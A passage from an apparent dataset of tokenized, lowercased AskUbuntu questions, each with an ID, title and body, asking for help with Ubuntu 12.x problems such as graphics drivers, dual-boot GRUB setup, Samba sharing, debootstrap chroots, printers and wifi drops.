/sys/devices/pci0000:00/0000:00:1c.3/0000:05:00.0/usb3/3-1 '' mar 31 17:03:37 ubuntu mtp-probe : bus : 3 , device : 3 was not an mtp device mar 31 17:03:37 ubuntu kernel : [ 109.668930 ] usbcore : registered new interface driver cdc_ether mar 31 17:03:37 ubuntu kernel : [ 109.669473 ] usb 3-1 : > bad cdc descriptors mar 31 17:03:37 ubuntu kernel : [ 109.669490 ] usb 3-1 : > bad cdc descriptors mar 31 17:03:37 ubuntu kernel : [ 109.669502 ] usb 3-1 : > bad cdc descriptors mar 31 17:03:37 ubuntu kernel : [ 109.669518 ] usbcore : registered new interface driver rndis_host mar 31 17:03:37 ubuntu kernel : [ 109.681131 ] usb 3-1 : > bad cdc descriptors mar 31 17:03:37 ubuntu kernel : [ 109.681205 ] usb 3-1 : > bad cdc descriptors mar 31 17:03:37 ubuntu kernel : [ 109.681266 ] usb 3-1 : > bad cdc descriptors mar 31 17:03:37 ubuntu kernel : [ 109.681302 ] usbcore : registered new interface driver rndis_wlan thanks in advantage for any hints . edit : i have same error ( usb 2-3 : bad cdc descriptor ) while running latest netinstal debian .
276518	ui freezes very often after moving the home directory	i maybe wrong but from what i understand i should 've done the movement of the home directory to another partition from a livecd , what i did n't do . i think that made the ui ( sidebar , upperbar ) and some other programs just freezes and i think crash as well . the occurance ranges from every couple of seconds to every every couple of hours . did n't find anything is the syslog . anywhere else to look at ? one thing is sure - i did n't do anything else that could 've caused it , and barely ever occured before .
276522	ca n't get fglrx to work	i tried switching to fglrx from the additional drivers tab in software sources . though when i restarted my system , all that displayed was my wallpaper and the courser . i managed to switch back to the x.org driver . i thought fglrx was fixed in ubuntu 12.10 . when will it be fixed again ? i have had these problems before .
276527	ca n't share my folders ?	hi there i 'd been looking for the solution but i hadnt found anyone that had the same issue . i 'm trying to share a folder but everytime that i tried to do so nautilus displays me an error . la «red compartida» devolvió el error 255 : net usershare add : can not convert name `` everyone '' to a sid . unexpected information received . some people received a similar error regarding an invalid directory or regarding a permission denied . just for the record i have install samba from the software center , since it didnt work i unistall it and reinstall it from the terminal.i 've also tried to share the folder runing nautilus as root but without any success . does any body have an idea that helps me ?
276529	hp 6570b video driver	i am sorry if this is a duplicate question , but after 2 days i did not find the answer to this problem , and i would really appreciate a link to a solution . i have been trying to get a video driver on my laptop so that brightness up and down shortcuts ( fn+f9 / fn+f10 ) work . in additional drivers only the xserver-xorg-video-ati drivers are working fine for me ( but without brightness control : adjusting the value in /sys/class/backlight/acpi_video0/brightness , but the actual screen brightness stays max ) . with the proprietary drivers ( fglrx and fglrx-updates ) ubuntu loads to the logon screen , but after logon just the desktop image is displayed . i tried to write in /etc/default/grub : grub_cmdline_linux= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' ... but that removed the adjusting brightness option from the system settings and the shortcuts did not do anything . hp has a video driver for linux for the 6570b notebook series , link . it is tar.gz file with two .rpm packages : ati-fglrxg02-hp-kmp-default-8.954_3.0.13_0.27-1.1.x86_64.rpm x11-video-fglrxg02-hp-8.954-1.1.x86_64.rpm ... using : sudo yum localinstall < one-of-the-two-above-packages > i get a lot of unresolved dependencies and do not know how to fix that . do i need to add additional software sources ? i did not find any on the page where the driver can be downloaded . how do i install the above provided linux dirivers by hp in ubuntu 12.10 ?
276535	how to shutdown a server that 's configured to use xrdp for remote desktop [ ubuntu 10.14 ] ?	i 've configured a server to use xrdp as my remote client , instead of vnc . my problem lies in the fact that i can not remotely shutdown or restart my server from within xrdp . choosing the shutdown or restart option just logs me out of the server , but leaves the server running . is there a way to force it to use the correct commands , rather than logging me out ?
276537	recommended dual boot partitioning for asus n56vm s4089v windows 7 64bit	being brand new to this , although i 've done alot of research , i would like confirmation that what i want to do is achievable with the current disk partition i have on my laptop . current set up via g-parted is this : partition/file system/label/size/used/unused/flags /dev/sda1 fat 32 system 200mb 34.21mb used 165.79mb unused boot /dev/sda2 ! unknown 128mb 0 used 0 unused msftres /dev/sda3 ntfs os 279.45 42.31gb used 237.14gb unused /dev/sda4 ntfs data 393.86gb 3gb used 390.86gb unused /dev/sda5 ntfs recovery 25gb 18.69used 6.31gb unused hidden , diag based on everything i 've read , the partitioning i want is- to reduce dev/sda3 to 75gb ( leaves approx 25 % free space ) in windows in gparted : change /dev/sda4 to extended and shrink to 105gb create /dev/sda6 root - 30gb create /dev/sda7 swap 12gb ( twice my ram 6gb ) create /dev/sda8 home - 60gb create another primary ntfs partition for data sharing between windows & ubuntu with remaining space . can i achieve this with my current drive setup ( since it already has 4 primary partitions ) ? if yes , how do i go about it ? fyi /dev/sda2 is a microsoft reserved partition , details here : http : //en.wikipedia.org/wiki/microsoft_reserved_partition i 've found a program via windows 7 forums to move bootmgr to c drive ( easy bcd ) . shd i try this first ? if you have a better idea for set up , please tell me . finally , how do i change /dev/sda4 to extended when i already have 4 primary partitions ? normally you create a new partition from unallocated free space and choose extended , but i ca n't create a new primary partition if i 've already got 4 ... ... i 'm determined to get ubuntu onto my computer but it 's been alot more involved/complicated than expected ! thanks in advance , karly
276542	stuck on usb boot	i 'm trying to `` try '' ubuntu on my windows 7 laptop and i installed 12.10 to a usb stick . i changed my boot preferences to boot to usb first . it boots from usb and i get a screen that says `` syslinux 4.86 edd 2012-18-13 copyright ( c ) 994-2012 n. peter anvin et al '' and it just sits there and does n't go past that screen .
276543	how to search for both within filename ( find ) and file ( grep ) using a single line of code ?	i 'm pretty sure i 've done this in the past ( and that an answer is out there somewhere ) , but ca n't remember right now . i 'm looking for a one-liner to search for ( and return / echo ) matches in both the filename and file . probably the easiest would be to run grep and find separately after each other ; but i 'd prefer a one-liner ... ... unless it were possible with a semicolon ( ? ) or other to run these tools sequentially . i do n't think the solution i 'm after would involve piping | because , to borrow from set theory , i 'm interested in the union of the two sets a and b ( a âş b ) , rather than their intersection ( a âš b ) .
276550	is there an facebook messenger app	i am looking for desktop application which for facebook messenger . i know pidgin can work with facebook chat , but it can not work with any messenger when from a person who is offline . is there a program which can do this ?
276552	how to add windows 7 to grub2 ?	i am currently using ubuntu 12.04 lts and i want to dual boot it with windows 7 . let me explain what did i do : there was only ubuntu 12.04 on and i get it 's image with clonezilla . ubuntu was installed on sda which is 128 gb ssd and there was a 1tb harddisk for another purposes . i desperatly try to install windows 7 alongside ubuntu but i ca n't managed it . windows 7 could not recognize my hard drives . so i searched and changed my bios settigs to ide from raid . i accomplished to install win7 on sdb1 . now i have a running win7 but there is no sign of ssd on windows . ( i know there wo n't be any ubuntu at boot because mbr writing over grub . ) after installation i tried to re-install grub but i failed . i used a software named `` boot-repair '' but that failed too . i switched my bios settings to raid from ide and now win7 is not booting . i tried to use repair tool in windows 7 installation disk which is another fail . switched back to raid and installed brand new ubuntu on sda . used clonezilla to restore my first ubuntu back on sda . tried to use `` boot-repair '' but failed again . current situation : in bios in storage device options my settings is raid . i have ubuntu installed on my sda . i have win7 installed on my sdb1 . my boot is grub and it only shows ubuntu . and here is an information about my disks situation which is created with `` boot-repair '' http : //paste.ubuntu.com/5665110/ my question and desire is simple . i want to dual boot these two systems . if i can add win7 which is in sdb1 at the moment into grub2 my problem will be solved . you can answer it here or i am willing to read any guide you can link to me . but i must say i read a lot of guides none helped . bootloader could be grub or mbr does n't matter . i can format all the harddisks there is no important information on both ssd and hdd ( which i tried but i failed that too. ) . i have an external 1tb usb harddrive ( if it can help any ) . thank you for your time to read my problem . = )
276572	how do i install video4linux2 in ubuntu 12.10 , and do i need to ?	i 'm still pretty new to ubuntu so please bear with me . i am running ubuntu 12.10 and i am trying to get a couple of old external usb webcams working on my laptops . the built-in laptop webcams work just fine , but sometimes i need an external cam . i can make the cams work in vlc , but my other cam apps like camorama and empathy do n't `` see '' the external cams and there is no place in the apps to specify a device path to choose between the default ( built-in ) or an external cam . do i need to install video4linux2 to make these cams work on my other apps ? if so , how do i install it ? i downloaded a packed file from the v4l2 website , but they do n't seem to have any detailed instructions on how to install it on ubuntu . any help would be most appreciated . thank you .
276580	what kernels are safe to use in 12.10 ?	i 'm considering an upgrade from $ uname -r 3.5.0-26-generic to kernel 3.8.5 . is this tested on 12.10 , and is it safe to upgrade ?
276582	is it safe to use a usb external drive without a valid partition table ?	here 's what i did : installed the sata hard disk in the enclosure connected it via usb with disk utility i formatted the drive with an ext4 file system started using the hard drive without any issue ( copying and deleting files from it ) when i was doing a random fdisk -l , i noticed that the drive did n't have a valid partition table : disk /dev/sdc : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdc does n't contain a valid partition table is it safe to keep using the drive like this ? should i be worried ? : ) thanks !
276584	using ubuntu-one on other linux distros ?	i 'm running different os on my computers windows ubuntu and also opensuse 12.3 . i 'm a user of ubuntu-one and i use it without any problem on windows and ubuntu but i cant find any rpm or source code to install or compile it on opensuse . can i use ubuntu-one on other linux distros like opensuse ? if so how ?
276586	windows formated disks ; are they any use on ubuntu ?	i have a bunch of disks ( digital dictionaries , encyclopedia ) on windows format . is it possible to read them with ubuntu ? ( 12:10 ) when i just put them in my drive , window says `` no respinse '' and it darkens out ( sometimes freeze )
276588	what happens when i expanding lvm+ecryptfs volume ( regarding encryption )	my system had a windows partition using the beginning of a 500 gb disk , followed by a lvm setup with a volume group and several logical volumes ( encrypted home , root , swap ) . i deleted the windows partition , formatted it , added it to the volume group , and expanded the home logical volume to use the new partition . df now shows /dev/mapper/volgroup-home having the appropriate larger size , but i ca n't tell if this new partition will be encrypted with the rest of home or not . how can i tell ?
276590	how to install and configure ubuntu one	i have several windows , mac and linux computers ( no servers ) and want to install ubuntu one on them to share and save information . so my question is : in what operating systems can i actually install ubuntu one ? what are the requirements for it ? how to install and configure it ?
276594	ca n't log in after waking up from sleep	i have this issue since the first time i installed ubuntu 12.04 lts . whenever my laptop wakes up from sleep the log in screen looks like this : in order to log in i end up restarting my system and in result i lose my work . how can i fix this ? any ideas why this is happening ?
276596	ca n't login in gui of ubuntu 12.04	i have done extensive search for the answer to this problem : on the login in page , after tying password , my screen turns dark for a second and becomes the login page again . the guest account does n't work either . what i have done : in tty1 : sudo rm /home/wks-403/.xauthority sudo reboot or in tty1 : sudo chown -r $ user : $ user $ home then press ctrl+alt+f7 and try to log in or change from lightdm to gdm , in tty1 : sudo dpkg-reconfigure gdm but none works on my laptop . the parameters of my laptop : thinkpad x-61 32bit graphic card : intel corp . mobile gm965/gl960 integrated graphics controller thanks for your suggestions ! ! update by suggestions from 'still a kid ' , input `` sudo startx '' fatal server error sever is already active for display 0 if this server is no longer running , remove /tem/.x0-lock please consult the the x.org foundation support for help ddxsiggiveup : closing log invalid mit-magic-cookie-1 keyinvalid mit-magic-cookie-1 keyxinit : giving up xinit : unable to connect to x server : resource temporarily unavailable xinit : server error i delete /tmp/.x0-lock and startx can not establish any listening sockets -make sure an x server si n't already running i am lost on what to do ... please help . the following is the info in /var/log/lightdm/lightdm.log http : //paste.ubuntu.com/5697791/ i notice there is messages saying 'greeter quit ' , so i look at /var/log/x-0-greeter.log : http : //paste.ubuntu.com/5697781/ there are warnings and critical info . i suspect this is due to graphic cards , but it does n't help after i updating my graphic card drivers .
276598	guake terminal appearance like a normal terminal ?	i love how the normal terminal looks on ubuntu . i recently installed guake and the guake terminal is pretty simple ( ugly ) : white on black with a simple font . furthermore it 's inconsistent with other terminal windows . is there a way to have guake use the same appearance/theme than the normal terminals ? update : ubuntu terminal : guake terminal : as you can see , the font and the background color is not the same . ( i also just noticed that the normal terminal is not using zsh , even though i chsh earlier before opening the terminal )
276599	how do i get ubuntu 12.10 to boot gui after removing libjpeg8 ?	in an attempt to install pygame on ubuntu 12.10 i removed lib8jpeg sudo apt-get remove libjpeg8 so i could reinstall it . `` this will fix that the pesky missing jpeg dependency , '' i thought . since removing it the machine refuses to boot in gui . i 've tried to no avail : reinstalling libjpeg8 from the tty login running startx from said tty running ( sudo apt-get update ) running ( sudo apt-get upgrade ) output from sudo apt-get install -f cabextract cdparanoia cdrdao freepats gimp-data icoutils imagemagick-common k3b-data kate-data kde-runtime-data kdelibs5-data libamd2.2.0 libass4 libattica0.4 libbabl-0.1-0 libcapi20-3 libcdaudio1 libclucene0ldbl libdca0 libdirac-encoder0 libdirectfb-1.2-9 libdlrestrictions1 libenca0 libfaad2 libfftw3-3 libflac++6 libflite1 libgif4 libgme0 libgstreamer-plugins-bad0.10-0 libid3-3.8.3c2a libid3tag0 libilmbase6 libiso9660-8 libjavascriptcoregtk-1.0-0 libkate1 libkdecore5 libkdesu5 libkjsapi4 libkntlm4 libkpty4 liblqr-1-0 libmimic0 libmms0 libmodplug1 libmpcdec6 libmpg123-0 libnetpbm10 libnss-winbind libntrack-qt4-1 libntrack0 libodbc1 libofa0 libopenal-data libopenal1 libopenexr6 libopus0 libpam-winbind libqapt1 libqca2 libslv2-9 libsoprano4 libsoundtouch0 libstreamanalyzer0 libstreams0 libtagc0 libthreadweaver4 libts-0.0-0 libumfpack5.4.0 libvcdinfo0 libvirtodbc0 libvo-aacenc0 libvo-amrwbenc0 libwebkitgtk-1.0-common libwebp2 libwildmidi-config libwildmidi1 libxss1 libxvidcore4 libzvbi-common libzvbi0 linux-headers-3.5.0-17 linux-headers-3.5.0-17-generic nepomuk-core-data ntrack-module-libnl-0 odbcinst odbcinst1debian2 oxygen-icon-theme python-compizconfig shared-desktop-ontologies soprano-daemon tsconf ttf-droid ttf-mscorefonts-installer ttf-umefont ttf-unfonts-core unixodbc vcdimager virtuoso-minimal virtuoso-opensource-6.1-bin virtuoso-opensource-6.1-common winbind wine-gecko1.4 winetricks
276600	hdmi sound drops on asus p8h77-m-pro ( 12.04 )	i recently got myself a htpc system . this is my setup : asus p8h77-m pro corsair 4 gb ddr3-1600 kit intel coreâ˘ i3-2120 intel ssd 80gb oem sata dvd burner i 'm running ubuntu 12.04 . i have this system hooked up to my tv through an hdmi cable . the problem i have is that the sound drops for a second at completely random intervals . it does this in every program , be it xbmc , vlc , firefox ( youtube vids ) or rythmbox . i have googled quite a bit but could not find anybody with a similar problem . does anybody know a solution for this ? i love ubuntu , i do n't have any windows pc 's in my house any more , it would be a shame if i would have to change this system because of this problem
276601	sounds have become unclean , now theres like static during all streaming and sounds like into a box and dusty	could anyone help me find out what had turned the sound on ubuntu 1204 like dusty and boxy ? what i should check out or what i should do in order to improve it ? the sound was pretty clean before i configured totem with 5.1 channels in dconf , but that does n't seems to me being the cause , since just after do this , it improved the sound in general . also , i installed alsamixer but i cant tell if thats what caused it . yet , ive uninstalled it , and sound still being terrible , like and old radio device . please someone , give me some hints or clues to figure out what could happened . thanks .
276603	hp envy 15 keeps restarting instead of installing ubuntu 12.10 from usb stick	i have set the bios to boot using the usb stick and i can get to a menu that asks if i would like to try ubuntu or install it . when i choose install , it asks me if i want to install ubuntu inside of windows 7 , which i choose . but then , the whole thing goes to a black screen and a bunch of console jargon scrolls on the screen for a while and before i know it , i 'm back to the menu asking if i want to try or install ubuntu again . if i select install , the same thing happens again .
276604	implications of setting `` usershare owner only = false '' in smb.conf	i 'm using wubi and want to share a directory from the ( win8 ) host via samba . when i try to do this using nautilus i receive the following error : 'net usershare ' returned error 255 : net usershare add : can not share path /host/path as we are restricted to only sharing directories we own . ask the administrator to add the line `` usershare owner only = false '' to the [ global ] section of the smb.conf to allow this . are there any negative implications to adding this line ?
276608	how can one enable double-tapping to zoom in firefox ?	i want to have a double-tap zoom functionality ( like on android or ios devices ) in my firefox web browser using the left mouse button . is it possible to change some browser settings in order to get it to work ?
276609	timestamp appears to be wrong on some log files	when i use scp to remotely check my server logs , the `` last changed '' timestamp on some files appears to be set in the future . i 've double checked the local time and timezone settings on both my server and the computer i 'm logging in from and both are correct . is there a reason the timestamp is wrong , and is this something i should worry about ?
276617	debootstrap failing to mount /proc	i have researched this , and none of the answers ( so far ) on here , nor googling seem to match my problem . here is the situation : i am running xubuntu 12.04 as a base install , and am trying to set up a debootstrap chroot install of backbox 3.01 ( also a 12.04 ) . both are amd64 bit architectures and i have verified that fact backwards and forwards . i have followed the instructions at both : https : //help.ubuntu.com/community/debootstrapchroot http : //unix.stackexchange.com/questions/12956/how-do-i-run-32-bit-programs-on-a-64-bit-ubuntu/12957 # 12957 ( thanks giles ! ) rtfm and fat-fingering issues aside , i have now run into an issue during the debootstrap installation where i am getting to a point and getting : w : failure trying to run : chroot /home/user/test/chroot mount -t proc proc /proc the installation that lays down is not enough to schroot to , as i have tried , nor if i redo with the -- foreign option does it do any better . the research i have done seems to indicate this issue is related to : trying to put a 64 bit install in a 32 bit os ( which i am clearly not doing ) possible issues with procfs in certain kernels , but the bug reports are unclear , and clearly this looks old a lot of virtualization related issues ( which i am not doing any ) i am thinking since this is a very simple installation of a file : /// based ( another ) ubuntu based distro into my chroot environment ( 64 - > 64 ) that there must be something real simple in the set up steps i have left out or forgotten . should i do something like pre-mount the /srv/chroot/backbox3_01/var/proc to something like : sudo mount -o bind /proc /srv/chroot/backbox3_01 any help would be appreciated . update * so i have dug around a bit more , and i at least know what part of the issue is . the failure is coming from the fact that `` mount '' is an unknown `` file or directory '' which means that at the context point that chroot is running from there is no `` mount '' executable that can be called . i am guessing that : a . some executable context did not get brought over and `` pre '' set up properly during the phase before this step ? or b . some environment properties need to be exported prior to running this script maybe ? or c . ? ? any help is appreciated ... *** further update ******* apparently the backbox installation is not getting inflated into the chroot directory anywhere near properly . backbox 3 is a precise ( ubuntu 12.04 ) based distro and i just ran debootstrap on precise . i get a full installation . when i do the same for backbox , i only get /dev , /etc , and /var set up . nothing else , which means `` mount '' does n't exist in the chroot'ed structure . i have tried installing this from the cd and from a local copy of the cd ( on my file system ) . i have checked the `` release '' doc on the installation cd and it seems complete , but i do n't see why it stops before installing the rest of the components . so i am guessing there is something in the backbox distro that is not set up to allow debootstrap to properly re-inflate it - at least from the cd distro . does anyone know of an online archive ( equivalent to http : //archive.ubuntu.com/ubuntu/ ) for backbox ? or if not , i guess my options are going to be : hacking the backbox distro to make it work , any suggestions where to start ? pulling down an xubuntu distro and then applying the backbox ppa ... is there a xubuntu script available for debootstrap and does anyone have a link to an automated installer for all the bb ppa tools to get them installed quickly ? : (
276620	ubuntu 12.10 , suddenly hd performing ultra slow for no aparent reason	on ubuntu 12.10 amd64 . i have been using this computer with ubuntu for a couple of years , and it has worked perfectly . this hd is just one year old . it is a 2tb hd . i have been using it mostly for a partition of 50gb for the root folder , the /home folder was just storing my backups and the profiles of the applications i have been using . so i coudl say i have not making use of this hd . i placed all my work files in an external hd , just for reasons like what has happened now . today i decided to check some files in another external hd , and finally decided to copy like 200gb of content from the external drive to the internal drive via usb 2.0 , as this was taking 2 hours i decided to do other things and went away from the computer . last time i checked there was like 45 minutes remaining , and went away again . also i think the screen saver got activated , it has been a source of problems several times , with this and with other computers for the last years . it is set up so only the screen gets blank , never the hd . many times i have not been able to wake up my computers . the fact is that when i came back to my computer , it did not respond . finally i had to do a hard reset . ... . fast forwarding , now i am trying to install ubuntu 12.10 again ( for second time today ) but the hd keeps being ultra slow . what could i do ? is this a hardware problem ? is the hd damaged ? thanks alex
276623	ca n't install the ia32-libs package	i 'm trying to build an ubuntu embedded linux kernel for beaglebone . part of the build has a dependency for ia32-libs . when i try to install it it say it needs ia32-libs-multiarch . but it says its not installable ! ( see below ) . i have tried other solutions from this forum without success . can someone explain what is happening and what i can do about it ? ian @ ubuntu : ~/beaglebone2/linux-dev $ sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch but it is not installable e : unable to correct problems , you have held broken packages .
276624	ubuntu 12.10 internet connection problem	i have ubuntu 12.10 installed on an external drive , it recognises that i have an internet connection , but web pages do n't load . thanks !
276625	my-weather-indicator alternatives ?	i 've just removed the applet `` my-weather-indicator '' ... this applet is really cool , but once or twice a day crashes on my ubuntu 12.10 , so i decided to remove it . is there any valid alternative ? i need just a simple weather indicator applet thanks : )
276626	how to switch input on an x-fi titanium from line to mic ?	the x-fi titanium has a single input for mic or line level input . right now it 's set to line level . on windows , there would be a checkbox to toggle this , but the sound panel in ubuntu 10.04 does not seem to have this option . how can i set it to mic level ?
276627	ubuntu 12.10 wo n't save display settings after reboot . how do i fix this ?	when i mean display settings i mean desktop backgrounds or icons that i removed from the unity launcher . it just goes back to the default every reboot . the only thing it did save is the theme that i changed . i installed ubuntu with wubi .
276628	ubuntu 12.10 , intel 945gm and google earth	i have an acer aspire 4710-2057 with 1 gb ram and intel 945gm graphics board . when i runed google earth for the first time it complained that my board has insufficient video memory , but it runs only does n't show the globe ( coutry borders are there ) . i have intel drivers installed ( it was installed by default on ubuntu installation ) . unity is running in 3d mode . anyone has seen something like this ? -nelson
276629	keep getting `` sudo : unable to resolve host ''	everytime i type in sudo it says that after it . i tried following others instructions , but it says bash : /etc/host : permission denied .
276630	downloads kill wifi	just installed 12.10 fresh . using a run-of-the-mill netgear n router , and a netgear wn111v2 usb dongle . the problem : i attempt to install anything using update manager , software center , or via apt-get , and i can download a few megabytes no problem , and then pow . no internet connection . connection to the router is fine , but the actual connectivity to the wan is gone ( download freezes , and no other software can access web either , including chromium/ff ) . all other machines on the network continue working fine . now , if i disable networking and then reenable it , connectivity comes back . for a moment . i download a few more mb , and then it freezes again . and so on . update : now , if i attempt to load a website which has a lot of overhead ( typekit , large images , etc. , ) , coming to a few mb , the wan connection drops . importantly , i note that i used this dongle with only very occasional connectivity issues for more than year , with versions 11.04 , 11.10 , and 12.04 . so something in 12.10 is ( apparently ) the culprit .
276631	ubuntu 12.04 not loading after removing wine	i used the following command to get rid of wine on my ubuntu 12.04 system but instead it got rid of everything ! sudo apt-get remove wine* now when i try to load my ubuntu i get the following : the system is running in low-graphics mode your screen , graphic cards , and input device settings could not be detected correctly . you will need to configure these yourself . '' when i try to configure myself i click `` restore from default '' but nothing happens . please help .
276632	installed 12.10 and after logon all i get is a purple screen and mouse	installed 12.10 on old laptop with 1 gig of ram with a 20 gig hard drive . all i get after logon is a purple screen and mouse . i ca n't seem to get it to run . i also tried to install it using the windows installer on a drive with windows xp and had the same results . i am about to give up on ubuntu altogether .
276634	libreoffice can not be removed completely	i am using ubuntu12.04 and the xfce4.6 . now i remove the libreoffice through the ubuntu software center , however it seems that it is not removed completely . since i can find the libreoffice item at the menu application-office-libreoffice , also i can run the libreoffice command in the terminal . both of them can start up the libreoffice , however this is the screenshot : as you can see , the text document drawing and etc are not available . what is the problem ?
276638	error : not enough space to load specific image	translated hi . i have a lenovo intel atom n270 laptop . it ha windows xp and i want to install ubuntu on it without deleting or affecting in any way the windows system . i am a common user , not an expert in this sort of computer tech stuff . for the installation i am following this spanish guide . i have already defragmented my hdd ( although windows still complains that some files need defragmentation ) and even did a backup copy of everything . i have identified that my processor is 32 bit so i downloaded the 32 bit version of ubuntu 12.04 for this laptop . i then downloaded pendrivelinux and follow the steps provided by it to install the iso image of ubuntu into a 4gb pen drive . rebooted the computer , changed the booting sequence and the boot menu for ubuntu started from the pen drive . that is where the problem first appeared . anytime i tried to either install or test ubuntu from the menu i got the same error : not enough space to load specific image after this and without knowing , i turned the computer off , took out the pen drive and tried to turn it on again . but now when windows starts i get a blue screen that says that windows has found an error and needs to shutdown to prevent damage . what can i do to solve this problem . thank you . original hola : tengo un computador portátil lenovo intel atom cpu n270 con windows xp y quiero instalar ubuntu sin eliminar windows . soy una usuaria promedio , nada experta en estos asuntos y para la instalación estoy siguiendo los pasos que encontré aqui http : //www.identi.li/index.php ? topic=96247 ya desfragmenté el disco , aunque me dice que hay algunos archivos que no logró desfragmentar , hice copia de seguridad de todo . identifiqué que mi procesador es de 32 bits , descargué la versión de ubuntu 12.04 para este procesador , descargué pendrivelinux y en una memoria de 4gb vacía segui los pasos de pendrivelinux para guardar alli la imagen iso . reinicié el computador , modifiqué la secuencia de arranque y efectivamente me apareció el primer pantallazo de instalación de ubuntu . ahi fue donde se me presentó el problema , no me permitió ni probar ni instalar ubuntu , en ambos casos me salió el error : not enogh space to load specific image . después de esto y sin saber que hacer , apagué el computador , saqué la memoria e intenté prenderlo otra vez , pero una vez abre windows me aparece una panatlla azul que dice que se ha encontrado un problema y windows ha sido apagado para evitar daños que puedo hacer ? les agradezco que intenten darme las instrucciones en el lenguaje mas sencillo posible , porque como ya dije , soy una usuaria promedio gracias !
276640	how to determine if installing updates will require a reboot ?	i have some ubuntu server machines which i 'd like to keep up-to-date , but not always if it requires a reboot . is there a way to tell if pending package updates require a reboot before installing the packages ?
276641	brother hl-2270dw stopped printing	not sure why my printer suddenly stopped printing . i have a brother hl-2270dw connected via usb . the /var/log/syslog show the the following when i unplug and replug the usb cord in . the only thing that really sticks out to me is : udev-configure-printer : failed to claim interface mar 31 19:21:54 spaceship kernel : [ 592.888013 ] usb 1-1 : new high-speed usb device number 6 using ehci_hcd mar 31 19:21:55 spaceship mtp-probe : checking bus 1 , device 6 : `` /sys/devices/pci0000:00/0000:00:02.1/usb1/1-1 '' mar 31 19:21:55 spaceship kernel : [ 593.022311 ] usblp0 : usb bidirectional printer dev 6 if 0 alt 0 proto 2 vid 0x04f9 pid 0x0042 mar 31 19:21:55 spaceship mtp-probe : bus : 1 , device : 6 was not an mtp device mar 31 19:21:55 spaceship udev-configure-printer : add /devices/pci0000:00/0000:00:02.1/usb1/1-1/1-1:1.0 mar 31 19:21:55 spaceship udev-configure-printer : device devpath is /devices/pci0000:00/0000:00:02.1/usb1/1-1 mar 31 19:21:55 spaceship udev-configure-printer : device vendor/product is 04f9:0042 mar 31 19:21:55 spaceship udev-configure-printer : add /devices/pci0000:00/0000:00:02.1/usb1/1-1/1-1:1.0/usb/lp0 mar 31 19:21:55 spaceship udev-configure-printer : failed to claim interface mar 31 19:21:55 spaceship udev-configure-printer : device devpath is /devices/pci0000:00/0000:00:02.1/usb1/1-1 mar 31 19:21:55 spaceship udev-configure-printer : mfg : brother mdl : hl-2270dw series sern : - serial : e2n539264 mar 31 19:21:56 spaceship kernel : [ 594.102843 ] usblp0 : removed mar 31 19:21:56 spaceship udev-configure-printer : add /devices/pci0000:00/0000:00:02.1/usb1/1-1/1-1:1.0/usb/lp0 mar 31 19:21:56 spaceship kernel : [ 594.108433 ] usblp0 : usb bidirectional printer dev 6 if 0 alt 0 proto 2 vid 0x04f9 pid 0x0042 mar 31 19:21:56 spaceship udev-configure-printer : uri contains usb serial number mar 31 19:21:56 spaceship udev-configure-printer : uri match : usb : //brother/hl-2270dw % 20series ? serial=e2n539264 mar 31 19:21:56 spaceship udev-configure-printer : device devpath is /devices/pci0000:00/0000:00:02.1/usb1/1-1 mar 31 19:21:56 spaceship udev-configure-printer : device already handled mar 31 19:21:56 spaceship udev-configure-printer : consider also queues with `` /usb/lp0 '' or `` /usblp0 '' in their uris as matching mar 31 19:21:56 spaceship udev-configure-printer : uri of print queue : usb : //brother/hl-2270dw % 20series ? serial=e2n539264 , normalized : brother hl 2270dw series serial e2n539264 mar 31 19:21:56 spaceship udev-configure-printer : uri of detected printer : usb : //brother/hl-2270dw % 20series ? serial=e2n539264 , normalized : brother hl 2270dw series serial e2n539264 mar 31 19:21:56 spaceship udev-configure-printer : queue ipp : //localhost:631/printers/hl2270dw has matching device uri mar 31 19:21:56 spaceship udev-configure-printer : re-enabled printer ipp : //localhost:631/printers/hl2270dw lsusb sees the printer : root @ spaceship : /var/spool/cups # lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 006 : id 04f9:0042 brother industries , ltd bus 004 device 002 : id 045e:0084 microsoft corp . basic optical mouse bus 003 device 002 : id 046d : c313 logitech , inc. internet 350 keyboard and the printer is still visible via cups by going to : http : //localhost:631/ but regardless no jobs actually come out . what else can i check on this sucker ?
276642	quick chinese input	i am using ubuntu 12.10 and quick classic of chinese input method . i can not flip to next page of the choices of words . please help . many thanks .
276646	gnome 3.8 on ubuntu 12.04.2 lts	how to i get gnome 3.8 on ubuntu 12.04.2 lts because i want to try it and i do n't want to upgrade to a non-lts version of ubuntu . without i back porting it ?
276647	bluetooth keyboard connects but does n't work	my hp touchpad wireless bluetooth keyboard connects to input service in blueman , but it wo n't work as a keyboard in ubuntu . blueman receives data from the keyboard however when i mash buttons , since the transfer rate goes up to about 5kb/s instead of 0 when idle . how can i tell ubuntu that the keyboard is a keyboard and it should listen to the input ? edit : 5/6/13 : this is still an issue , and the dozens of various things i 've tried over the past weeks have n't helped . only restarting works ( it has this problem after standby ) . edit : 7/4/13 : updating ubuntu to 13.04 fixed the issue for me . the script posted here in the top comments also worked .
276649	where is the settings.json file stored for transmission ?	i 've bought a raspberry pi and i have managed to install xbian , samba and bittorrent ( transmission ) . all the fun showed up when i tried to upgrade the older version from the repo to the latest version - transmission 2.77 - by following the steps as mentioned on ubuntu help community wiki . my question is - where is the settings.json file stored ? i can download via command line with success - but i ca n't configure the settings file to allow the remote web interface ... ( i can only find the settings file which the previous version used ) .
276661	how i can properly update virtualbox to the latest version ?	i 'm new in ubuntu and i do n't know how to properly update virtualbox on ubuntu 12.10 . how i can update properly virtualbox 4.2.8 r83876 to virtualbox 4.2.10 on ubuntu 12.10 . i dont have a virtual machine yet on virtualbox im not expert on linux and text commands , so i appreciated an answer not using many technical words .
